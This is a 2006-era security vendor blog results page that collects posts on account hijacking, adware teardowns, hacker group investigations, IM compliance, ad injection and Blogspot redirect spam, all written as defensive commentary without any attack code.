Results matching “About Blank” from SpywareGuide Greynets Blog

1. Don't answer your secret question with the real answer. Instead, select something completely unrelated (for example, First Pet = Will Tuttle) that you can remember, effectively giving you a second password.
   
2. In the "address 2" line of your profile, put down: "XBOX SUPPORT DO NOT ASSIST WITH ACCOUNT RECOVERY" to help automatically raise a red flag when a customer support rep looks up your account.
   
3. If you're planning on gaming away from your default console, put your account on a memory card or move it with your hard drive, as opposed to recovering it on another machine.
   
4. Never reveal any personal details about yourself while gaming over Xbox Live.
   
5. On that same note, go ahead and leave your profile's bio blank. No need to tell everyone where you live.
   
6. Limit the amount of information you put out there for everyone to see on social networking sites...or any website for that matter. Especially ones where you also have your Gamertag listed.
   
7. Create an Xbox Live passcode if you haven't already. To do this, select "My Xbox" on the Xbox dashboard and go to your profile, then go to "Account Management" then "Xbox Live Pass Code."

A while back, I wrote about the recent Dreamcast Phish and my declaration of love for the ill-fated console (which is currently undergoing something of a Renaissance with home brew kits, games and movie appearances) seemingly took a few of you by surprise, especially those that also had a thing for the SEGA console! I thought it might be fun to post up some pictures of my gaming collection - feel free to post up links to yours, because stuff like this is always interesting. Shall we start at the beginning? Oh, as this post is image intensive I'm sticking the main content after the jump so if you're not interested in looking at lots of pictures of plastic and cardboard, now is the time to turn back!

For those that are still with me.....

I'm still trying to process this to be perfectly honest, but one of my close contacts has confirmed there is someone going around either hijacking, hacking or phishing user accounts on Facebook, then randomly uploading pictures of child torture to their photo albums and / or funwall.

.......yeah, that's messed up right there.

So far, I have one definite confirm on at least two accounts that were taken over (most likely by the same individual), one of which had the child torture pictures uploaded to it and the other - well, it wasn't child torture but it nearly cost someone their marriage, according to my friend.

This happened a few weeks ago, and Facebook apparently haven't replied to the person who raised it with them yet. I've also heard a few mutterings about other accounts taken over with extremely dubious content posted to them, but nothing confirmed on those yet.

Obviously, if you're at work (or even at home) and you suddenly click into the kind of material mentioned above, you could get into all sorts of trouble real fast. While I'm not about to suggest everyone jumps out of Facebook right this instant, I would advise extreme care with your login credentials while this lunatic is on the loose.

My friend (who reported the hacked profile that was on his friends list) has confirmed the lady who was hacked didn't save any of the images (which is understandable, really). So no blanked out screenshots to show you - if we get confirmation of these postings, we'll update with more information as we get it...

/ Update - As I've said here, this is NOT a "wave" of attacks, merely two profiles that have apparently been tampered with. Remain vigilant, but please, no need to start panicking.

Last week, I heard rumblings of an "interesting" screenshot doing the rounds on a few forums, but I had no clue where to look for it. Then someone anonymously popped up on MSN - as they quite often do - and sent me a link to the screenshot in question.

As you might have guessed, the screenshot involved Myspace. What's worrying here is what the contents of the screenshot could mean, and the less than amazing response I've had back from Myspace. See, let me say this right away - whenever you trawl through the super secret security mailing lists, backroom areas on forums etc - there's always one question that keeps popping up, and it usually always draws a blank.

"Anyone got a contact for Myspace"?

Most of the time, nobody ever does. For all intents and purposes, their security team - whoever they are - might as well reside in another Galaxy. So when a screenshot containing what looked like a pile of sensitive data related to Myspace came my way, my eyes started to roll and didn't stop for three whole days.

Now, I had no clue what I was looking at but it didn't sound very good given that this was supposedly popping up on various underground forums. Some of the items from the screenshot included:

"Domain Account Administrator, Myspace"

"CSR-Tools"

"Account: Retail"

"Billing Information".

These are just some of the items contained in the screenshot. Besides that, there's a number of domains seemingly connected to Myspace down the left hand side and a bunch of contact information (Emails, names, addresses, User ID numbers) in the main portion of the page.

Has someone wandered into the main admin panel for Myspace? Is this something to do with a storefront related to the site? Is it something else entirely? Who knows, but you can probably guess what happened when I attempted to draw attention to this. I mailed them using their autoform last week - no reply.

I tried again this week, and this is what I sent them:

hello, my name is chris boyd, director of malware research
for facetime security labs. This is the second time I have
sent this through, with no reply so far. A few days ago,
someone pointed me in the direction of a screenshot a few
people had heard about (screenie URL goes here).

Thanks,
Chris

Can you guess what I got back?

Hello,

A: A 'blog' is an online journal. Blog is short for Weblog. In recent years, 'blogging' or posting an online journal has become very popular.

.....yes, thanks for the handy blogging tips(!)

I mailed them right back and this time, I was supposed to be given an answer by an actual person. As it turns out, the auto reply above made more sense than what I was handed back. I sent them the same Email above - this is what I got (bold emphasis added by me):

Hello,

Most errors are cleared up in a matter of minutes so try to access the page again in a minute or so. If it's a significant problem, we're probably already aware of it and are currently working to resolve it. Please be patient.

......wha? Thanks for advising me to try accessing your potentially compromised system again in a few minutes, but that doesn't really solve anything, does it?

I've resent yet again with a little note asking if anyone there actually bothers to read anything they're sent, but I'm not getting my hopes up. I'd like to think the above screenshot doesn't represent anything serious, but would someone bother posting something like that to websites if they didn't think it was a big deal in the first place? I mean, call me paranoid, but I'm not entirely certain I want to be anywhere near a Myspace page at the moment. Is it safe? Is it compromised? Nothing to worry about? Being taken care of? Who knows?

Little help, Myspace?

/ Addendum - I just received the latest reply to my efforts to draw attention to this, and it's the best one yet.

I sent Myspace this:

"Is anyone there actually reading what I'm sending you? I'm telling you that you appear to have been compromised, potentially quite badly. And you're sending me another reply that doesn't help and tells me to "try to access the page again in a minute or so"?! I guess that would be useful if I was the one doing the compromising, but this isn't really much use to me, is it?"

Let me repost my message for a third time"

This is what I got back:

"Hello,

We do not offer that option as it is not available within MySpace."

....I think my brain hurts.

It's worth remembering that it's not just social networking sites like Myspace that get all the hacker-style attention. Recently Friendster has had its fair share of wobbles, too.

From about July to August of this year, a virus was doing the rounds called "Saviour of the Seoul", which (at first glance) would likely seem to be a calling card for Korean hackers. Now, because I happened to do my University Dissertation on 20th Century Hong Kong Cinema - don't ask - I can add a little bit more to the thinking behind this, because I know that "Saviour of the Seoul" is a sly reference to a particularly crazy film from the early 90s resurgence of HK Cinema, called - obviously enough - "Saviour of the Soul" (minus the "e"). It makes no sense whatsoever, but it's very pretty. Anyway, for no good reason, our leet hax friends decided to name their virus after this film. If you had this appearing in your profile page code:

...then you'd have the words "Saviour of the Seoul" sitting in the bottom corner of your profile, quite often while the rest of the page remained blank. The only way to fix your profile at that point would be to scrub everything and start all over again.

There also seemed to be a slightly different version of this attack, where you'd have an image file placed on your profile instead:

...don't those Smileys look grumpy?

Anyway, over here, we have an apparent redirect to a .za domain. And finally, we have a rash of comments being posted to profiles that seems to say "hello", seemingly mixed in with some choice insults. To date, this final profile attack is still ongoing - we're looking into it, and will report back with any new findings...

Upon hearing bad reports about a product called "Messenger Skinner", we decided to investigate. The program (whose target audience must strongly favour kids by virtue of the fact that the most entertaining thing it gives you is dancing bananas) has a number of issues that make it something I'd rather not recommend. Note:

"Messenger Skinner is free of any kind of spyware or trojan".

Interesting statement. Let's continue.

...looks innocent enough so far, but things are about to get messy.

Presented with a "real" installer. That's good.

The text box is stupidly small. That's bad.

The "no" button is pre-checked and you have to physically select yes. That's good.

I don't like the colour scheme. That's bad.

The EULA is certainly comprehensive. That's good.

But that's only because there's apparently two of them.

That's bad.

See, during install, the EULA you see is NOT the EULA you see by clicking "Terms and Conditions" from the program entry on your Start list. Indeed, once installed, all you really get is a very general ramble about liability, licensing and intellectual property. Right at the end, under "Uninstall", you get the briefest of mentions for this:

"UNINSTALL
This software is completely free as it is subsidized by the Favorit contextual advertising component."

....ooh. In fact, we need to hope that anyone installing the program not only took great note of the EULA during install, but copied and pasted it onto their system to get a better idea of what's likely to be going on in their system.

Namely:

1. USE OF THE SOFTWARE

1.2. The Software includes a component which will remain active at all times with the objective of verifying and ensuring the correct functioning of the Software, and offering other advantages (?Component?). When the User is connected to the Internet the Component will make periodic connections to the Provider?s servers in order to check that there are no problems in the access network or the User?s Computer. If any error which prevents the normal use of the Software is detected in the User?s Computer, the Component will seek to identify and solve it. Any changes that the Component makes to the User?s Computer will be to clearly non-essential parts thereof and for the purposes referred to in these Conditions. THE USER REQUESTS AND AUTHORIZES THE INSTALLATION AND UPDATING OF THIS COMPONENT TOGETHER WITH THE SOFTWARE IN ACCORDANCE WITH THE TERMS SET OUT IN THESE CONDITIONS. The Component will carry out the tasks described in these Conditions only when the User is connected to the Internet, whether using the Software or the User?s regular Internet connection. In any case, the User can easily uninstall the Software or the Component by selecting ?Access Connection? and ?Component Add-On? respectively in the appropriate section of the operating system control panel. Users should be aware that upon such uninstallation, the advertising messages might be sent during a period of three months after said uninstallation, the benefits provided by the Component will not be available and in certain cases the Software (if retained) or the Provider?s services may not function correctly.

Adverts for three months after uninstalling? Nice! As you'll see later, the hoops you need to jump through to uninstall hark back to the "good old days" of Direct Revenue making you download additional software to uninstall the first unwanted program. Tonight we're gonna' party like it's 2004! Yay!

1.4. In order to carry out the operations referred to in the paragraphs above, the Component will send certain data from the User?s Computer to, and will receive information and requests for these purposes from, the Provider?s servers. The data sent to the Provider?s servers by the Component will be limited to technical and connection information such as: operating system user name, name of the computer in the operating system, IP address of the LAN of the computer, country of connection, browser default country, operating system version, operating system or browser service packs installed, ID of the most recent browser update, vertical and horizontal resolution of the monitor screen, IP address of the most recent internet connection, maximum and average response times, percentage losses, name of the last RAS connection and others relevant for the purposes indicated. The User authorizes such exchanges of information with the Provider?s servers in accordance with these Conditions. At no time will any information regarding Internet sites visited or other activities of the User be sent to the Provider?s servers; this information will be processed within the User?s Computer in order to anonymously select advertising or other messages to be shown to the User. In no case will the Provider be able to identify the User nor will any profile of the User be created.

...."limited to"? What else is there left to grab, shoe size?

For the sake of this:

....I'm starting to feel pretty uncomfortable about installing this program. Oh, note that I had to blank a few smileys out because they were, er, sort of rude. Enjoy, kids!

Anyway, now we come to the meaty part. If you installed this program and happened to run, oh, I don't know....a bunch of Rootkit Scanners...you'd probably see something a little like this:

.....and, from another testbox, something like this:

....hidden, randomly named executables? Oh, awesome. That's just what the world needs more of. I guess that's why Symantec say the following on this writeup, then:

"# Hides the following files by using rootkit technology:

* %System%\[RANDOM].exe
* %System%\[RANDOM].dat"

......to coin a phrase, whoops.

At this point, I bet you're dying to see the program in action, right? Exactly how does Messenger Skinner operate in the context of the MSN Chat system? Well, the answer is faintly interesting:

.....check it out, it almost totally hides the adverts served up by MSN! I wonder if they'd be happy knowing this product did that? I guess we'd better move onto the uninstaller that time forgot. In the rather general "terms and conditions" available from accessing the program via the Start menu, right at the bottom, is this:

"UNINSTALL
This software is completely free as it is subsidized by the Favorit contextual advertising component.

The end user can uninstall our component by filling the following form:
http://www.pc-on-internet.com/uninstall"

.....oh dear. I'm sort of surprised anyone still releases applications like this - especially as it all smacks of hoop jumping and a faint impression that they don't actually want you to uninstall any of these things. For a perfect example of what I mean, check out this writeup from 2005 where I battled with the Uninstaller for Direct Revenues Aurora.

Let's all pause while you read that and say a few brief words for Aurora.

What's that? Nobody got anything good to say about it? Nah, didn't think so. Anyway....let's go over how I think uninstalling a program should go.

1) Decide to uninstall.
2) Run uninstaller.
3) The end.

Now let's see how it goes down in Messenger Skinner Land, or as I like to call it, "Hoop Jump City Central" (like Nutbush City Limits, but with a better beat).

The Main Uninstall Page:

The Terms and Conditions Page:

The Privacy Policy Page:

....WHAAAAAAAAAAAAAAA?

That's right, to uninstall the program, they insist that you open up THREE DIFFERENT PAGES and read through endless reams of text - just to uninstall something!

Not only that, but then you have to hand over your Email address to contact them, tell them why you don't want it on your system anymore and (finally) "wait for someone to look into it" and then, finally, presumably, hopefully, send you the link to the uninstaller.

But wait, it gets BETTER. Can you believe it? Look what awaits you in the mailbox:

Absolutely incredible. You're stuck with a 24 hour limit to obtain the uninstall program. If your Internet connection breaks, or you weren't planning on sitting on front of your PC all day waiting for their all important Email - too bad! Furthermore, they have such iron clad faith in their uninstaller program that if you run it more than three times, you see this:

Even better, both Panda and Prevx flag the uninstaller as suspicious:

And even better than that, there are some people out there complaining that the uninstaller doesn't actually seem to be very good at, er, uninstalling things.

Ladies and Gentlemen, I give you the epitome of "complete disaster". Without a doubt, this is one of the worst uninstall routines I've seen in years, and you can put that on a wall and frame it.

Finally, there are a bunch of domains on the server hosting Messenger Skinner that are related to the parent company. Of particular interest is one called crazygirls-world.com (registered to the same guy as Messenger Skinner), which leads you to....

.....Dialer related porn on a site called "gad-network.com". Of course, it's no surprise that we see Gad-Network leads us back to the Favorit Network site.

.....wait, didn't I get a really amazing uninstaller from there once?

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Technical Research: Chris Mannon, FSL Senior Threat Researcher
Additional Research: Peter Jayaraj, FSL Senior Threat Researcher

Sometimes, it's impossible to know where an investigation will take you. And though your initial focus might change somewhat, every now and again the focus will change so dramatically that what you end up with is nothing like what you were expecting.

This is one of those occasions.

A few days back, someone posted a link on the Spywarewarrior.com forum, asking if it was a "list of hijacked Emails". It definitely looked suspicious, so with that, off I went to have a look around.

....okay, hundreds of Email addresses with names and no other information provided. Not a lot to go on. However, a quick Directory jump back and....

Eight sets of files containing thousands upon thousands of Email Addresses.

Not just Email addresses, either. Depending on the document opened, you might find yourself looking at a collection of EMail addresses, full name, postal address, IP address and time / date they submitted their form / mail to whatever website they happened to be on at the time (yes, the websites were listed too). Though we've blanked a lot out, the following screenshot will still give you an idea of how much data is up for grabs (note the scrollbar at the side of the screen is only halfway through this particular page):

...ouch?

The majority of the websites listed are down, but you can probably guess the content - possible prizes in exchange for your Mail Address (and possibly other information) being used in opt-in databases for "promotional purposes", anyone? Yeah, I'd think that was a good bet. There's nothing wrong with genuine opt-in....but something has gone seriously wrong here, and the potential for things to get out of hand very quickly will soon be seen.

Googling one of the domains flagged up an interesting thread on a popular Adult Webmaster forum, gfy.com:

Quote time:

"What I am offering is 150-200k Daily Emails - 4-6 Mil Unique Monthly Emails
Full Data Included. name,email,address,ip,time,date,source etc

Price is 2.5k Monthly and we also accept Weekly payments as well"

Now, at this point, everything is likely to be legit; everyone has opted in; the data is only going to be sold to "a maximum of three people".

The problem is, once you submit your details to anything online, it doesn't take long for that information to wind up in all sorts of strange places you couldn't possibly have imagined (the seller probably didn't see this coming, either). Over the course of a year or two....wow. As proof of this "wow", check out the below shot taken from another directory of the website we were looking at earlier:

....."hacked pages"? "IP Scan"? "IE Exploit"? I'd hate to be the Master of the Obvious and claim my Spidey Sense is tingling, but let's have a look at some of the items in the folders. Kicking things off with "Hacked pages", we immediately discover some cool and funky things about our targets:

Ah! Viva la Group Louz O MNIN Ndouz Room Pal! (Or was it "Le"? I never was fantastic with French). I guess at this point you'll be wanting to see an example of their handywork, right? Oh, okay then. Here's a hacked page of theirs from sometime around July:

....yeah, that's not the most dazzling hacked page ever, is it? Kids just don't put the effort in these days. However, things are about to get a little more interesting (because one solitary page hacked does not a leet hax0r make). Let's take a look at the "IE Exploiter", because this is the unexpected gold that sends this entire investigation somewhere else entirely:

Running the tool creates a page of HTML and deposits it on your desktop. That HTML mentions a file called "Bl4ck". Haven't I seen that somewhere before?

Yep, right here in August 2006.

Put simply, you run the tool, generate your HTML and edit it (and your EXE as appropriate, or stick with the "Bl4ck" file (and keep the optional .WAV file too!) - the core of this attack appears to be this exploit. For those interested, the default hacked page will look like this:

...plain, but it gets the job done I suppose. Because you can use whatever EXE you want with this thing, there's plenty of potential for Internet badness. Here's a forum post complaining of the same exploit in October 2006 - it seems the file in that instance tries to send Spam mail. Now we can see why the guy with the Email lists would want to keep hold of a tool like that. Here's another example of a banking trojan being dropped in the same way.

But wait, we're not done yet. I recognise some of those usernames listed on the IE Exploiter tool. A few of them tied in directly with the investigations into the Q8 Army hacks from 2005/06. IM Rootkits, fake BitTorrent clients and Mr Bean videos being pushed via the BitTorrent installs (no, we never found out what the deal was with Mr Bean).

Focus on Sniper_SA, mentioned in the "Greetz" section of the program. He's responsible for the hack above featuring The Terminator (in that case, pushing the default "Bl4ck" file) but a lot more website hacks besides. Check these out:

A lot of digging around later, and I finally stumble across this website (note the fake MSN Chatbox window in the bottom left hand corner - top tip, never click these):

From there, it's only a quick jump over to Snipers' forum:

On the main page, there's a huge list of members - many of whom are either well known for their hacking exploits or (again) had their usernames come up repeatedly during the Q8 Army investigation. Here's a small selection:

....that's a pretty big collection of leet hax0rs. After wading through those for a while, I eventually came across someone posting on a number of forums who would post up hacks, cracks, virus writing techniques and more besides....the majority of the posts always giving the Email address of the IE Exploiter tool creator in his examples. It's a fairly safe bet they're one and the same person, but what really broke my brain was his avatar:

....Please, tell me you see it too.

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Additional Research: Peter Jayaraj, FSL Threat Researcher

Our CEO, Kailash Ambwani talks on the greynets concept and how the majority of internet traffic has evolved from http to communicative application traffic. Ambwani discussed how enterprises are adopting greynets, how this increases security liabilities, and how FaceTime security products enable and secure greynets. Remember, Facetime is about enablement and controlling these innovations inside of the Enteprise. Why? Because customers are demanding to communicate this way, and often an organization's most sophisticated users- the forward thinkers and innovators willl bring them into the network because they realize their value, but sometimes forget about the security and regulatory risks involved.

Here is part one and I would note to pay particular attention to how anonymizers, like Rodi and / or Tor, can be used to bypass typical forms of defense. Naturally, and Kailash acknowledges this, products like Tor (designed by the EFF), can be used as anti-censorship tools, especially in countries where this is a problem.

However they can be a disaster, a potential legal nightmare for large enterprises and I.T. administrators to manage. Kailash goes on to note how malware is now profit driven...in his limited time he didn't get to explore the use of widgets, (often thin-Ajax clients) or the stripping of content using browser-powered tools allowing the the propagation of content like video across the Enteprise. This can also be problematic given attacks like Windows Meta Frame exploits or exposure to inappropriate content.

In part two Kailash goes on to discuss how Facetime addresses the issues. Once again the focus is on enablement and control. The Internet is changing and we all must change with it.

Del.icio.us Tags: podtech_news, facetime.com, facetime communications, skype, greynets, VoIP, IM security, instant_messenger_security, enteprise_security, perimeter_security, security_solutions, Enterprise_IM, control_applications, IT_managers_risks, ediscovery, tech_execs, web2.0, web_2.0, web2.0_security_risks, anonymizers, RTG, Real_Time_Guardian

Technorati Tags: podtech_news, facetime.com, facetime communications, skype, greynets, VoIP, IM security, instant_messenger_security, enteprise_security, perimeter_security, security_solutions, Enterprise_IM, control_applications, IT_managers_risks, ediscovery, tech_execs, web2.0, web_2.0, web2.0_security_risks, anonymizers, RTG, Real_Time_Guardian

In Internet News Week our V.P. of Marketing Frank Cabri makes a notable quote along the lines of our usual rapier wit-wielding MVP- Chris Boyd. (e.g. describing IM safety along that "Ben Stiller and Circle of Trust Kind of Thing".)

"Some organizations' ears are ringing from this consumerization of an IT trend and the fact that employees are bringing in unsanctioned applications through the back door," Cabri said. "Organizations are hearing about it from us, from some of the industry analysts, and in many cases, seeing it first hand on their networks."

And yet there are still many that aren't aware of the issue and usage continues to grow. The recent Mark Foley case in the U.S. Congress where, in which Instant Messaging was used to send inappropriate messages to a teenage congressional page, is a case in point.

"Sometimes it takes a Mark Foley-like situation to happen in your own organization to raise awareness of the risk and the impact," Cabri noted. "Obviously, our goal is to help customers before this happens."

"Lets face it, no business wants to get 'Foley'ed' on a national level -- the business consequences of this could be extremely negative."

Ouch- "Foley'ed"- adapt coinage indeed. Frank is, of course, referring to the recent Mark Foley Scandal that recently emerged in IM.

Learn More: See a brief video of Kailash Ambwani, our CEO at Facetime Communications...as he covers why words like "guarantee", "rumor" or incidents like the Mark Foley Scandal and failing to monitor IM (or other greynets) can lead to big problems, especially if you are a big company.]

This cascade of events is one of the drivers that is forcing big companies to take a hard look at their corporate policies, especially with regulatory challenges like:

- Gramm-Leach-Bliley Financial Modernization Act (GLBA)

- Sarbanes-Oxley Act of 2002 (SOX)

- Health Insurance Portability and Accountability Act of 1996 (HIPAA)

Will the Foley Force raise awareness of the issues? Good question and more pertinent than ever now December 1st approaches. What is the big deal about December 1st? It is "E-discovery Day" when things could get more tedious and potentially more costly for the Enterprise if they are not prepared.

E-discovery refers to finding and producing documents stored in electronic form in response to litigation or regulatory requirements. Civil litigants, regulators and criminal prosecutors as a matter of course now ask for copies of selected e-mail communications or make broad requests for all electronic records. After Dec. 1, changes are set to take effect in the Federal Rules of Civil Procedure make e-discovery a standard part of federal proceedings.

So where can you start if you are a large enterprise? First, figure out how much instant messaging traffic is going on in your network-you might be surprised not only by the traffic, but the other insidious malware that rides along. Facetime has a free tool called the RTMonitor that can help with this or you can contact them for a demo.

Best Practices for Emerging Compliance Challenges: Electronic Messaging and Communications (ReymannGroup):

[Download IM Compliance and Regulations Document [PDF] This paper is a great primer on what you need to know.

Some might be wondering...just what is Instant Messaging (IM)? We use it everday, it has been around for a decase, but because of its ephemeral nature we tend to treat it differently. I consulted Archive.org for some background...

Instant Messaging (IM) is an electronic messaging service that allows users to determine whether a certain party is connected to the messaging system at the same time. IM allows them to exchange text messages with connected parties in real time.

To use the service, users must have IM client software installed on their workstations. While there are many types of IM clients, they all tend to function in a similar manner. Client software may either be part of an agency's IT network and available to only registered users, or be public and available to anyone on the Internet. The client software logs into a central server to create connections with other clients logged in at that same time. Users create and exchange messages through their local client application.

Other important points:

* In addition to sending messages, users may have the ability to attach and exchange electronic files such as images, audio, video, and textual documents. This capability depends on the configuration of the individual client software as well as on protocols established at the client server.

* Depending on the software, users who are online may have the ability to respond to messages.

* Users may also block other users with whom they do not want to exchange messages.

* Users may only communicate with others using the same or a compatible client software.

How does IM differ from email?

Fundamentally, the difference between IM and email is the notion of presence. This means that users of the IM system are aware that other users have logged in and are willing to accept messages. Unlike email, IM content can only be sent to users who are logged in to the system and accepting messages. If users are not logged in, others do not have the ability to send them messages.

Because IM is not predicated upon an open standard, there is no uniformity regarding message transmission and structure.

Remember Instant Messenging will be treated like an e-mail- IM, despite its ephemeral or fleeting nature, it is a document- a document that should be factored into your archive equation if you want to cover the bases soundly and not get "Foley'ed"....let's go back to Archive.org...

Does IM content qualify as a Federal Record?

The statutory definition of records (44 U.S.C. 3301) [Google Government Research Query on 44 U.S.C. 3301] includes all machine readable materials made or received by an agency of the United States Government under Federal law or in connection with the transaction of public business. Agencies that allow IM traffic on their networks must recognize that such content may be a Federal record under that definition and must manage the records accordingly. The ephemeral nature of IM heightens the need for users to be aware that they may be creating records using this application, and to properly manage and preserve record content. Agency records management staff determine the record status of the IM content based on the overall records management policies and practices of their agency.

I think in light of the recent scandal (and how many don't we know about...) we probably will see agencies taking a new look at their IM practices- it is potentially too costly to ignore. This isn't the only scandal either, there are others, but they tend to focus around e-mail, again don't discount the ephemeral nature of IM, like the "Boy's Club Case" as reported by Baselinemag.com.

Peratis wanted WestLB to search for e-mail and Bloomberg messages from mailboxes of 19 current and former equities executives, human-resources representatives, bank managers and others, using more than 170 terms. These ranged from Quinby's name and initials, to employment-related words like "fire" and "bonus," to derogatory sexual slang...

In this case I don't know if IM was enabled or factored into discovery. However, according to our recent studies- it often is enabled, whether IT is really aware of it. Odds are after the Foley Case- e-mail will not be the only prime target for discovery- discovery that can be quite expensive to dig up if an Enterprise is not prepared.

Web publishers, content creators and providers aren't able to earn a living from their products. <Snip> online consumers have proven reluctant to pay a monthly subscription fee for access to online content and entertainment. <Snip> Zango has developed a unique solution to this economic dilemma. <Snip> With the Content Economy model, consumers are able to access and enjoy web content and entertainment for free, because when they search or browse online for products and services, they see ads from Zango advertisers. <Snip> Web publishers and content providers get paid by Zango for distributing their creative assets. Zango earns revenue from online advertisers, and thus, keeps this new Content Economy alive and thriving.

Last month, a particular Instant Messaging attack was infecting users via Yahoo Instant Messenger and causing all kinds of problems. This month, we've discovered a variant that's linked to a sophisticated piece of possible clickfraud (depending on how you define it). We often hear about Botnets in relation to this kind of scam - indeed, a common tactic which we've seen a number of times is to hijack the infected drones' homepage and fill it full of clickable adverts that bring in a return for the Botnet owner. Here, we have an attacker going one step further and doing away with the complicated aspect of the Botnet altogether, substituting it for a more straightforward scheme involving the worm mentioned above as a launchpad. Effectively, we have a Botnet without bots, and the potential for financial fraud is in some ways more severe, because of the ease with which this particular attack spreads. First, let's take a look at the technical aspects of this attack...

Ben Edelman has some new spyware research about Vonage and some of the unsavory things going on. It is a long and technical read, but I recommend it. (see link to video at end) and Late Entry on Vonage behind the scenes action.

He covered several examples, but the one that caught my eye and I wanted to talk about was the use of ad injection.

Examples he covered in the article. Ad Injection in bold.

Spyware-Delivered Pop-Up Ads
Direct Revenue
Targetsaver - covering AOL
Targetsaver - covering a sexually-explicit site
SearchingBooth

Banner Injection Into Others' Properties
Fullcontext - ad injected into Google.com
Searchingbooth - ad injected into True.com
Searchingbooth - ad injected into eBay
DollarRevenue - replacing an ad within Boston.com

Spyware Delivered Banner Farms
Hula's Global-Store
ExitExchange

Spyware Lead Acquisition
Direct Revenue - Vendare's Myphonebillsavings
Direct Revenue - NextClick's Phonebillsolution

It is worthy to note that in the first three examples: Google, eBay, and True.com ads are injected above a site.
However, DollarRevenue injects its ads into a site - covering a banner placed by the site. For a site this means the person who bought the media might not be getting their fair share and the site owner is not getting paid.

But what does this mean for people- netizens?

I was intrigued by this question and what seems to be a relatively dead tactic coming to life the field. So I queried Ben for a discussion. In short he wondered aloud whether banner injection might be "the next big thing." He told me that until this past month, he had only seen one spyware program injecting banner ads into others' sites: DeskWizz's SearchingBooth. but then this past month he found two more -- FullContext and DollarRevenue. That's a startling and rapid growth -- suggesting there may be more to come.

Ben also pointed out that these ad injectors benefit from the lack of transparency in banner ad syndication. At least affiliate merchants generally get to approve their partners one by one. (Most sophisticated merchants have long since disabled auto-approve.) But when advertisers buy banner ads, especially run-of-network / remnant / untargeted ads, they get very little visibility into where those ads appear. This is practically an invitation for placements in spyware injections and other unseemly locations.

In the past many users suspected they had spyware from all the annoying pop-ups, but like the Borg the dark forces adapt and change tactics- smaller front prints, random file names and MD5's, using rootkits- so I am not surpised if this new tactic enters into the fray. I can invision it popping up on social networks like MySpace or non-hierarchical news sites like Digg.

The Ad Injection is very subtle and thus people may not know it is going on and that a program is doing it.

Take for this instance an "anti-fraud screen" I found while tracing the money trails of a mass spam attack (still looking into that one) that was delivering malware and porn through deceptive SEO and encoded JavaScript injection. In this case, as I understand it so far, a company from Russia runs a private pay-click-engine and I believe offers XML feeds and search results powered through syndication results from various pay-per-click search engines. They dole out up to 75% or more for webmasters and pocket the rest.

While it is good 7Search is periodically checking for problem syndication- I have to ask- why do you need the end user to police it? I would prefer them to keep the problems out at the gate.

What topic did you click? Straight forward. If you can remember. Why not log the topic?

Are you infected with spyware? How would they really know? That is how it got the moniker "spyware" in the first place. People didn't know how it got there or someone else installed it or any number of situations occur.

Are you a part of pay-to-surf program- name them? Ouch. Not as if people getting paid are going to out anyone- or would they? Doesn't add up to me. Not to mention incetivized search historically gives low yields for advertisers.

In closing pay close attention to this video from Ben's research on the DollarRevenue ad injection. The easy to catch warning signs of spyware infection may indeed fade meaning people will have to be all the more careful.

Watch in full video of what an ad injection looks like: Edelman's Video on Ad Injection. (Opens to New Window)

LATE ENTRY: Using the ever-so-handy insider status in the ad world I have learned from more than one anonymous source that Vonage is putting on hold a number of their advertising deals. I am not sure if it is just with the companies Edelman cited in his research or how far this reaches yet. At any rate Vonage is reacting and getting serious in their response. This could be a pivotal movement in the spyware wars. You kill the spies by cutting out the well-funded brands sponsoring their existence.

The issue of Blogspot URLs being redirected and used for exploits has been noted before. In this particular case we follow the evolution of sophisticated mass spamming of Google's Blogspot service URLs, coupled with other search engine spam techniques and trace the cascade of events that follow.

Overview: The "Simple Scenario"

1) Party unknown figures out how to optimize Blogspot pages to achieve high rankings in MSN portal Search Engine Results Pages (SERPS) for popular terms known as keywords, in particular keywords around World Cup coverage.

2) This person uses Google's Blogspot hosting. It has been noted before that Blogspot hosting allows users to insert JavaScript into the head of the HTML page, creating a vulnerable environment.

3) Party unknown implements a complex server-side, auto-rotation system on a domain hosted elsewhere.

4) Party unknown accomplishes "cloaking" the Blogspot URLs, hiding the auto-rotation system. The pages rank high in many MSN search results for targeted keywords.

5) Users conducting queries on MSN or users who arrive on the tainted blogspot URLs are redirected to various pages. In this particular example some sites display explicit pornographic content in addition to offering software downloads with a documented history of security risk.

The World Cup

This investigation over distribution and deception was kicked off by one of the world's biggest sporting events- the World Cup. We all have our favorite teams, and at FaceTime we want people to be able to follow their favorite teams and sports safely! The goal of our research was to investigate a popular sporting event and probe the Internet for attacks, social engineering, or any other malicious or deceptive activity centered around this event.

Flow Chart Sample of Events

To better understand the event flow, click the thumbnail image below to enlarge. This will open to a new window.

Deceptive Mass Spamming Distribution

Basic search engine analysis shows the "party unknown" appears to be using automated techniques to spam guest books and other web pages in order create links to the domain. Because of the auto-rotatation system the domain's homepage changes frequently and apparently randomly. For example, it often defaults to Google's own portal for India.

Search System Pollution

As we will show, the techniques used to taint MSN search rankings are based on an understanding of the MSN search algorithm. However the primary deceptive tactics are carried out through obfuscated JavaScript injected into Google's Blogspot page headers. This is significant because this particular problem as been publicly noted before by researcher Ben Edelman.

WARNING TO USERS: DO NOT go searching for these sites unless you are a trained security researcher. There is a dynamic component to this operation which could lead to a hostile environment or unwanted content. In short- What you see is not what you may get..

Research: How Did This Happen?

While searching for the keyword ?World Cup 2006? in the MSN search Engine, our researcher clicked the first natural result, the result below the sponsored ads. This result appeared to be an innocent looking Blogspot URL as screenshot will demonstrate.

Note on Search Engine Results:

Search engines use their own systems to determine the relevancy of a page for a keyword entered in the Search Box. Based on the search engine's algorithms the pages will be ranked and appear in the results. These results are often called SERPS or Search Engine Result Pages.

In crude theory the first result should be more relevant to the keyword, and second result would be a somewhat less relevant page?etc. Numerous factors effect relevancy beyond the scope of this write-up. It is reasonable to expect people to believe they will find the most most relevant pages on the first pages of the results. For this reason, in this study, we have placed emphasis on studying the first results returned in the SERPS.

How Did this Page Get to the Top?

In simple terms by using "spam techniques." With JavaScript functions of a browser turned off the user would see a page like this:

Click To View Page with JavaScript Off

Redirection and Misdirection Over Time

Upon some of the first checks of these URLs our researcher noted redirects to the following
Russian web-site. By.ru is a common hosting company, and the "tkgroup" appears to be a student class blog.

At first glance it might seem this could be a student prank merely playing search engine tricks. However,
after several days the same result redirected our researcher to a different website which is now ?Adult DVD Download Network? IcooNet. The context and tone have now changed considerably. The tone is now commercial in intent but also pornographic. Users would have no way of knowing the site they were trying to reach would serve pornographic content if they relied on the title, text description and link displayed in the SERP.

